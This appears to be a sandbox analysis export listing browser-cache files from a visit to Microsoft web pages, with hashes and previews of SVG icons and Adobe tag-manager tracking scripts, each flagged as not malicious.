                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50"><defs><style>.cls-1{fill:#2f2f2f;}</style></defs><title>Prefooter_Vectors</title><path class="cls-1" d="M40.4,16.09a14.41,14.41,0,0,1,1.11,3.24,16.2,16.2,0,0,1,.37,3.42,15.54,15.54,0,0,1-.63,4.44A15.84,15.84,0,0,1,32.88,37V38.5H21.63v2.25h4.5V43H14.88V40.75h4.5V38.5H8.13V22.75h2.25a15.5,15.5,0,0,1,.56-4.19,15.78,15.78,0,0,1,11-11,15.86,15.86,0,0,1,8.62.07,15.9,15.9,0,0,1,4,1.8,15.55,15.55,0,0,1,3.34,2.84A15.91,15.91,0,0,1,40.36,16h0Zm-30,20.16H30.63V25H10.38Zm3-18a13.36,13.36,0,0,0-.77,4.5h6.75q0-1.14.07-2.26t.21-2.24Zm8.79-8.42a13.49,13.49,0,0,0-4.46,2.35A13.3,13.3,0,0,0,14.44,16H20a26.31,26.31,0,0,1,.82-3.19A13.65,13.65,0,0,1,22.19,9.83Zm8.44,12.92q0-1.14-.07-2.26t-.21-2.24H21.91q-.14,1.13-.21,2.24t-.07,2.26ZM26.13,9.34a1.53,1.53,0,0,0-1,.38,4.22,4.22,0,0,0-.86,1,9,9,0,0,0-.72,1.36q-.33.76-.58,1.49t-.43,1.39q-.18.65-.26,1.05H30q-.09-.4-.26-1.05t-.43-1.39q-.25-.74-.58-1.49A9,9,0,0,0,28,10.7a4.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Prefooter_Icon_PowerCord[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):302
                                                                                                                                                                                                              Entropy (8bit):5.351026925841641
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:tvKIiad4mc4sl3QQkaguXABNPX9KRdbBRFW7AS9KRpg4714SBG3jppXT:tvG1jkGAr8dbBRj2KC4715BGTppXT
                                                                                                                                                                                                              MD5:C2442C289BB7C58FF328F2482C0F5DA0
                                                                                                                                                                                                              SHA1:19919649BDB860CCB297CD5723F08DE8DBD153C1
                                                                                                                                                                                                              SHA-256:0637D2B9FB19C88EB4764D9BB21A900FB43BEBE7C78C9A729D8DF3F7C9AC7BB7
                                                                                                                                                                                                              SHA-512:B362AD67C8EA3804BBBFB1B9EA11A918B88F8289D21BD634EC4F784AFD43098060F23EBDC4AF903B7B9AA1F15077FA46E7771C7C68C3A1ACC98248058B76CB17
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon_PowerCord.svg?version=3d41ef0f-fcff-4126-0dfc-499e388476b3
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50"><defs><style>.cls-1{fill:#2f2f2f;}</style></defs><title>Prefooter_Vectors</title><path class="cls-1" d="M25,9.06,40.94,40.94H9.06Zm0,4.75-12.5,25h25Zm-1.06,8h2.13V32.44H23.94Zm0,14.88V34.57h2.13v2.13Z"/></svg>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Prefooter_Icon_Register[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4851
                                                                                                                                                                                                              Entropy (8bit):3.83658682501437
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:STdFYr7z6LuoWv0kLjGf4y+YiUPfthwMMvf+bzvrBCJ+XaaeRm3LfNk:SQr7WSfZjG9i0y+vVCJ+QsLfy
                                                                                                                                                                                                              MD5:E2ED0EF2A31F5039FCE16F6D66B026B5
                                                                                                                                                                                                              SHA1:017FDFADDB99F63BE69A0E4132CAA99FD1488187
                                                                                                                                                                                                              SHA-256:937A8643E73862DB96407B48C64F71201B08B583B941D291CEABEBAE878DB769
                                                                                                                                                                                                              SHA-512:914B88110497588B200B4EF359BCEE5B4063EFA7CCAD8F220C2F5B66B5EF277DFE2AB58EF6D09C29987FD818731E1C0361F81477A752932F34199466EAE0FBE7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon_Register.svg?version=0956d5fb-33ca-bdf9-3cab-37dcadb07379
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50"><defs><style>.cls-1{fill:#2f2f2f;}</style></defs><title>Prefooter_Vectors</title><path class="cls-1" d="M25,7.5a16.93,16.93,0,0,1,4.64.63A17.82,17.82,0,0,1,33.81,9.9a17.7,17.7,0,0,1,6.29,6.29,17.82,17.82,0,0,1,1.77,4.17,17.34,17.34,0,0,1,0,9.28,17.83,17.83,0,0,1-1.77,4.17,17.7,17.7,0,0,1-6.29,6.29,17.82,17.82,0,0,1-4.17,1.77,17.34,17.34,0,0,1-9.28,0,17.83,17.83,0,0,1-4.17-1.77A17.7,17.7,0,0,1,9.9,33.81a17.83,17.83,0,0,1-1.77-4.17,17.34,17.34,0,0,1,0-9.28A17.82,17.82,0,0,1,9.9,16.19,17.7,17.7,0,0,1,16.19,9.9a17.83,17.83,0,0,1,4.17-1.77A16.92,16.92,0,0,1,25,7.5Zm0,32.81a14.75,14.75,0,0,0,3.81-.5,15.68,15.68,0,0,0,3.53-1.41,15.41,15.41,0,0,0,3.08-2.22,15.62,15.62,0,0,0,2.47-2.93q-.22-.51-.43-1a3,3,0,0,1-.21-1.09,6.77,6.77,0,0,1,.06-1c0-.26.08-.48.11-.66s.06-.35.08-.5a1.34,1.34,0,0,0-.06-.52,4.09,4.09,0,0,0-.3-.7q-.21-.41-.62-1.06,0-.12.06-.32a3.46,3.46,0,0,0,.06-.43,3.6,3.6,0,0,0,0-.42.71.71,0,0,0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC17190c9a276b4cdab7dc77e71fcde573-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1217
                                                                                                                                                                                                              Entropy (8bit):5.359865538734852
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:D0/ct/Bu0lU9Sq7dLepIybSo5zrC/EyuM5dN/fyQVpUwuIPn/:D00t/Bu0lM7ly79ps3N/VWA
                                                                                                                                                                                                              MD5:6EAB9B77053A26F9EA7F2E579AAB4F60
                                                                                                                                                                                                              SHA1:CE2E57402A1EF88CDB23B716CB2BFC5177969957
                                                                                                                                                                                                              SHA-256:2C37AD0F5E46411D7611B6650D2F9042E2032C403A60CE595978ED9D8FF88C65
                                                                                                                                                                                                              SHA-512:914F63A743D16D30EF723FB43C188AD80C9B563F46F956563596100F3E10569DE8A7BE5C988B01D2B16574C19B869E1B61D9D731CD67302F8F4453837FCD244E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC17190c9a276b4cdab7dc77e71fcde573-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC17190c9a276b4cdab7dc77e71fcde573-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC17190c9a276b4cdab7dc77e71fcde573-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.dcm&&function(g,n,t,a){var e=function(){try{window.location.pathname;n.genericSrc=\"8400690\",n.genericType=\"surf\",n.catPurchaseNow=\"pchn_std\",window.location.pathname.match(/\\/en-us\\/surface\\/devices\\/surface-duo\\/?$/i)&&(a(document).on(\"mousedown\",\"a[data-js-dialog-show='buy-flow-dialog']\",function(){try{n.trackEvent(n.genericSrc,n.genericType,n.catPurchaseNow,null,this);var g=\"https://secure.adnxs.com/px?id=1268102&t=2\";wdgtagging.util.requestImage(g),wdgtagging.addTagExecuted(\"Xandr\",\"Conversion\")}catch(a){t.debugLog(\"Error setting surface-duo dcm\"+a)}}),wdgtagging.addTagInfo(\"Xandr\",\"2020August-v1\"))}catch(g){t.debugLo
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC2c82363df66d4caeadff9a77d1ccc036-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):30613
                                                                                                                                                                                                              Entropy (8bit):5.189269998244185
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:eX8iTXKnthtO4kDgJGBZ7Xvamnt7sobXoxs0mpVkKnW3:XiTXKnthtO4bI/3nt7N6s1lnu
                                                                                                                                                                                                              MD5:3505B0FFA596380B55B9336773557A26
                                                                                                                                                                                                              SHA1:FB0EF2839C9BB03374735871CD54E01B66C6A6E0
                                                                                                                                                                                                              SHA-256:22D59448E0F405A33F95F308958C027136063D58F4999DABB8B7B5AFA5A0DB52
                                                                                                                                                                                                              SHA-512:F63E09419818509440A8C67615C1E0A921B0DA0C2CF18E65DD736D389A88341D6C7C97D8AB1839051B90F6A45B4329582C0CF0153B5A9AB7FA7E5104B5DE1807
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC2c82363df66d4caeadff9a77d1ccc036-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC2c82363df66d4caeadff9a77d1ccc036-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC2c82363df66d4caeadff9a77d1ccc036-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(t,a,d,s){window.location.hostname;var i,n,e=window.location.pathname;d.tagMSStoreBehavior=function(){return\"PARTNERREFERRAL\"},d.isMicrosoftStore=function(t){return t.attr(\"href\").match(/microsoftstore/i)||t.attr(\"href\").match(/microsoft\\.com/i)&&t.attr(\"href\").match(/\\/store/i)},d.tagChooseContentType=function(t){return 0<t.find(\"img\").length||0<t.find(\"picture\").length?\"image\":r(t,\"class\",\"glyph-play\")&&(t.find(\"span\").length<=0||r(t.find(\"span\"),\"class\",\"screen-reader\"))?\"button\":r(t,\"class\",\"mscom-popup-close|m-back-to-top|video_pp_button\")?\"button\":t.is(\"button\")?\"button\":\"text\"};var r=fu
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC430a0fea81d243238f6110f9f9de6a00-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):28769
                                                                                                                                                                                                              Entropy (8bit):5.186790142941075
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:3hRx2+j2vyfAJ2ZgS4xWwG1LRSBBIzDrHKHcLzBldXyi0:HoY8uXzdXe
                                                                                                                                                                                                              MD5:A232F55B0A5D0B28FA354B4FE9420FF8
                                                                                                                                                                                                              SHA1:C525A4674B7D88AD54CCE141120445B0779091BA
                                                                                                                                                                                                              SHA-256:7A44DEDFE1AF822B96D93DA987E3C9749682F58B2E0536B5FCD56E6B13F5BA8E
                                                                                                                                                                                                              SHA-512:68291E23F9B15AF472059B23A5CD80656751140CB086F940E55290CD892029837EC7CA3677EA6171C4FEE6A05A6870B31F2B2E93B956083406AE8746F103C11A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC430a0fea81d243238f6110f9f9de6a00-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC430a0fea81d243238f6110f9f9de6a00-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC430a0fea81d243238f6110f9f9de6a00-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(t,a,r,c){c(\"#BodyContent,.m-page-bar\").attr(\"data-bi-area\",\"body\"),r.tagLightboxArea=function(){c(\".c-dialog\").each(function(){c(this).attr(\"data-bi-area\",\"body\"),c(this).hasClass(\"hatchDialog\")?c(this).attr(\"data-bi-name\",\"getHatch-lightbox\"):c(this).attr(\"data-bi-name\",\"lightbox\"),c(this).attr(\"data-module-id\",\"lightbox\")})},r.tagLightboxArea(),window.location.pathname.match(/\\/xbox-game-pass/i)&&c(document).on(\"mouseenter\",\".gameMoreInfo\",function(){c(this).find(\"a, button\").attr(\"data-bi-area\",\"body\")}),window.location.pathname.match(/live\\/year-in-review/i)&&(c(\"a.cta-l
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC4531a4e4108f48ab95bfce9b9140bf03-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):589
                                                                                                                                                                                                              Entropy (8bit):5.276179001316918
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefCG4ReDLLct/BefCG4ReDLiLgU985SDqiKoufoAVNUwuGn/:D+SLct/Bu+SpU985SZugM6wuGn/
                                                                                                                                                                                                              MD5:2C4C866FF11BAC8064C891C3245A407F
                                                                                                                                                                                                              SHA1:D21AF2D58B173006C4120A20C65694D8E2C82C72
                                                                                                                                                                                                              SHA-256:0E8FE2CF170578C3CA08F304D673D17F07264A05D94A781304F236BBF4652310
                                                                                                                                                                                                              SHA-512:FD6079B2FC86793831D3E59086AD24DBBB68958F5FC839BF48D135F2D52B6272D25695522354E8EAA86CF99F53D90B2B6ACBEE45ECE6A0688602617D2EE5D1FC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC4531a4e4108f48ab95bfce9b9140bf03-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC4531a4e4108f48ab95bfce9b9140bf03-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC4531a4e4108f48ab95bfce9b9140bf03-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.comscore&&function(g,n){var i=function(){n.init(\"//www.microsoft.com/library/svy/min/\")};g.category_all_status||g.category.analytics.status?i():g.category.analytics.queue.push(i)}(window.wdgtagging,window.wdgtagging.comscore,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC4cb4bd0f177d48349e0967511dff021e-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2592
                                                                                                                                                                                                              Entropy (8bit):5.390420063253456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:DUt/BuFm6cM9Ac7LlGCnSBaYmOPVKF+c3WlW/04MwDR/YGH:ABBM9jSXVKF9WlW//zZ
                                                                                                                                                                                                              MD5:E07002C7D668501C1560E47DF43192FC
                                                                                                                                                                                                              SHA1:C874DA46BA01B0FA3604353202DEBA338C8206B8
                                                                                                                                                                                                              SHA-256:0E5690533AB9EC88A17A3E06864C94147AE396A78C8336D57F275E9371F6A56E
                                                                                                                                                                                                              SHA-512:13214368C9A84D16FC18A45A46F054416E5CE14A1764796582618ED40A5E9991ABCB1923E92945AF8D93CC30FFB0BDCEC313C6949AB863181D21931516E54558
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC4cb4bd0f177d48349e0967511dff021e-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC4cb4bd0f177d48349e0967511dff021e-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC4cb4bd0f177d48349e0967511dff021e-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.facebook&&function(r,c,d,s){var e=function(){function e(t){var e=c.getProductInfo(t),n={content_name:i,content_id:e.id||t.attr(\"data-bi-prodid\")||t.attr(\"data-bi-product\")||\"\",content_type:\"product\",lang_locale:o,partner:e.retailer||t.attr(\"data-bi-prtnm\"),cta:e.cta||t.text().trim()||t.attr(\"data-bi-name\")||\"\"};d.trackEvent(\"trackSingle\",d.globalpixelId,\"AddToCart\",n)}d.globalpixelId=\"1770559986549030\",d.init(d.globalpixelId);var o=r.getData(\"langLoc\")||\"\",t=r.getData(\"loc\")||\"\",i=r.getData(\"gpn\")||\"\",n={content_name:i,market_name:t,lang_locale:o};d.trackEvent(\"trackSingle\",d.globalpixelId,\"PageView\"),d.trackEven
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC5a76fb711f8f47b581632aa500f1bc39-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):651
                                                                                                                                                                                                              Entropy (8bit):5.438829873401494
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefCGyK1ct/BefCGyKgLgU9bZ6QYXLiYreTC5pd5D70PPdwukan/:Db1ct/BubXU9l6QY7iYnN5v03dwuPn/
                                                                                                                                                                                                              MD5:B6466C4A01B99B033714808907A5AB80
                                                                                                                                                                                                              SHA1:40CD8C05D0F8337876ACF93E885063ADB091F010
                                                                                                                                                                                                              SHA-256:18BBE6802D4BC131FA914FE87C1FB609659105E0AE2C2BE8AF5846CF47E7DB8A
                                                                                                                                                                                                              SHA-512:7057BA062B0EC24400FFAAE77CAD18CEDEC3BF813EF2F5D85457E6CB0B503C92B105C78391449C607D07A5A2C18276303007329685ACA6B53FBA48922B66A0F6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC5a76fb711f8f47b581632aa500f1bc39-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC5a76fb711f8f47b581632aa500f1bc39-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC5a76fb711f8f47b581632aa500f1bc39-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(i,g,t){t(document).on(\"mousedown\",\"li[id*=wf_e50] a\",function(){try{var i=t(this).parents(\"[id*='wf_e50']\").attr(\"id\");t(this).attr(\"data-bi-id\",i)}catch(n){g.debugLog(\"Error Machine Learning experiment tagging: \"+n)}})}(window.wdgtagging,window.wdgtagging.util,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC683368007e154c38814065ef2499a0b8-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4632
                                                                                                                                                                                                              Entropy (8bit):5.571432878197205
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:LtBBalr6/NkJOmZsyuKk/AU3k02pI8k2ak:LtB8lrykgmi1P/2pI8k2ak
                                                                                                                                                                                                              MD5:28A11044A9B1F68CCC8EE9F5AB13227A
                                                                                                                                                                                                              SHA1:395A2F350A7E5B6D6A64C3BEDDC4C1CAD440586B
                                                                                                                                                                                                              SHA-256:207D11D28C8B21F160AE57C14CD9F594309E3CCFB8A2FD092C09763EDBDA10A3
                                                                                                                                                                                                              SHA-512:91BBD96C28B6283CAB02F1EDD32C405D515B78E5159F0B2EF355D6C2823A9EFAD98641B74F06320C1D519119B47C38853A4B57197882F78F6D5251D7B2A3068C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC683368007e154c38814065ef2499a0b8-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC683368007e154c38814065ef2499a0b8-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC683368007e154c38814065ef2499a0b8-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.google&&function(n,o,c){var a=function(){var a=[\"devices/compare devices\",\"devices/surface pro 4/overview\",\"devices/surface book/overview\",\"devices/surface pro/overview\"],e=[\"us\",\"gb\",\"au\",\"ca\",\"fr\",\"jp\",\"it\",\"de\",\"nl\",\"nz\",\"ch\",\"es\"],r=n.getData(\"langLoc\"),t=n.getData(\"gpn\");-1<e.indexOf(r)&&-1<a.indexOf(t)&&o.track(968413686,null,!0),t.match(/devices\\/surface (laptop|pro|pro 4)\\/overview/i)&&r.match(/US|DE|FR|IT|NL|CH|ES|CA|JP|NZ|GB|AU/i)&&c(\"a[productbuyxmlid]\").on(\"mousedown\",function(){o.track(855686259,\"yu1rCK-DnnAQ8_iCmAM\",!1)}),/\\/en\\-gb\\/surface\\/devices\\/surface\\-laptop\\/?$/i.test(locatio
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC6be9b9327bb449c3a91ca999c97630be-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1434
                                                                                                                                                                                                              Entropy (8bit):5.221159669561074
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:D/ct/BulU9YENWeW3vvW3P049KbOMRAZ7ir2LLf7UX97inAUIsotawuQPn/:D0t/BulBeWnW/04mkLfoAT2gU
                                                                                                                                                                                                              MD5:89469E97880727A811430658DD193ED9
                                                                                                                                                                                                              SHA1:69C5D515F8D0B3AC6E3D403ECDE2B376708BDBCB
                                                                                                                                                                                                              SHA-256:E3DD7ADF496EFB55DEA47B55E65B893D756A8C7B1B71A1AEDD68A12CCC75286F
                                                                                                                                                                                                              SHA-512:1622D3013CADE48C0275BB11D3F11A9D9F1F8E703675CDB8DD2046836E73BC6EAB3DADA82DB65F73725BE2FCCFBBF9762CD9D7CA14380F171DA18A1DDBFE8AA9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC6be9b9327bb449c3a91ca999c97630be-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC6be9b9327bb449c3a91ca999c97630be-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC6be9b9327bb449c3a91ca999c97630be-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.linkedin&&function(t,n,o){var s=function(){n.init(\"7850\")};try{if(t.siteConsentLoopCountLinkedIn=0,\"undefined\"==typeof window.mscc&&\"undefined\"==typeof window.siteConsent)s();else if(\"undefined\"!=typeof window.mscc&&\"undefined\"==typeof window.siteConsent)if(\"function\"==typeof window.mscc.hasConsent&&window.mscc.hasConsent())s();else var d=setInterval(function(){if(o.checkSiteConsentObject()){clearInterval(d);var n=!1,e=!1,i=!1;n=window.siteConsent.getConsentFor(\"Analytics\"),e=window.siteConsent.getConsentFor(\"Advertising\"),i=window.siteConsent.getConsentFor(\"SocialMedia\"),e&&n&&i&&s()}else 500<t.siteConsentLoopCountLinkedIn&&clear
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC72522898d0e44fa085335247a291b122-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):12867
                                                                                                                                                                                                              Entropy (8bit):5.339674799609316
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:aA95ENb5r8wOqixW7ug2shiwhcjCqjq5lfnPic+tgRNh:75ENVr8wOq97ug2sthcjCqjq5lfnPiT+
                                                                                                                                                                                                              MD5:398FBDF57029AD526B7E9E1D429EDB37
                                                                                                                                                                                                              SHA1:71818451EA572A34D202E0428D8ACCE1CFBFA686
                                                                                                                                                                                                              SHA-256:41909E9E9391E4F8C02A3AFF63D0B90540F4199278FC23C5E1A1BDE6B98AF9BA
                                                                                                                                                                                                              SHA-512:40A5A01B842985037513310F6845C95A1BA0963E979825819E3C3B7691F17512740CEC64B440C0A83785A212CA2FE1D52CBB36F6B6F69604D866852D758F9570
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC72522898d0e44fa085335247a291b122-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC72522898d0e44fa085335247a291b122-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC72522898d0e44fa085335247a291b122-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(t,a,m,L){m.tagPartnerName=function(t){!L(t).attr(\"data-bi-prtnm\")&&t.href&&L.trim(t.hostname)&&!t.hostname.match(/javascript|^#|xbox\\.com/i)&&L(t).attr(\"data-bi-prtnm\",t.hostname)},m.tagChooseContentType=function(t){return 0<t.find(\"img\").length||0<t.find(\"picture\").length?\"image\":o(t,\"class\",\"glyph-play\")&&(t.find(\"span\").length<=0||o(t.find(\"span\"),\"class\",\"screen-reader\"))?\"button\":o(t,\"class\",\"mscom-popup-close|m-back-to-top|video_pp_button|ps-lightbox-close\")?\"button\":t.is(\"button\")?\"button\":\"text\"};var o=function(t,a,o){var i=L(t),r=new RegExp(o,\"i\");return i.attr(a)&&
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RC757e0fad0c5148689679137d9cb145db-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):38670
                                                                                                                                                                                                              Entropy (8bit):5.312092146699118
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:jm/JxCzXRbMIx2o2cl+93pfWXLgpe2r2PYTDr9ctbXcwvu2SDWL9rU:eJxCzXRbMIx2o2cl+93pfhr2PYXriRNy
                                                                                                                                                                                                              MD5:EFB568EEA867ABB923BF0B6EA9A07C5D
                                                                                                                                                                                                              SHA1:6D1590F46B23CC932327DBB7DCB787F5C7DF39C9
                                                                                                                                                                                                              SHA-256:BD56B5F1D5ACFD323B7BDF55CD098F4648DAB8B8939D04EFDB3D596718C6B393
                                                                                                                                                                                                              SHA-512:A96ED9999A1D0D2033B0625014E0798AA43096A557662A15891E883E1D8A161D8BB23752DD5DCB6FC039BB9F8EC697A2430F0304A223CBEC7F00040001683D9C
                                                                                                                                                                                                              Malicious:false
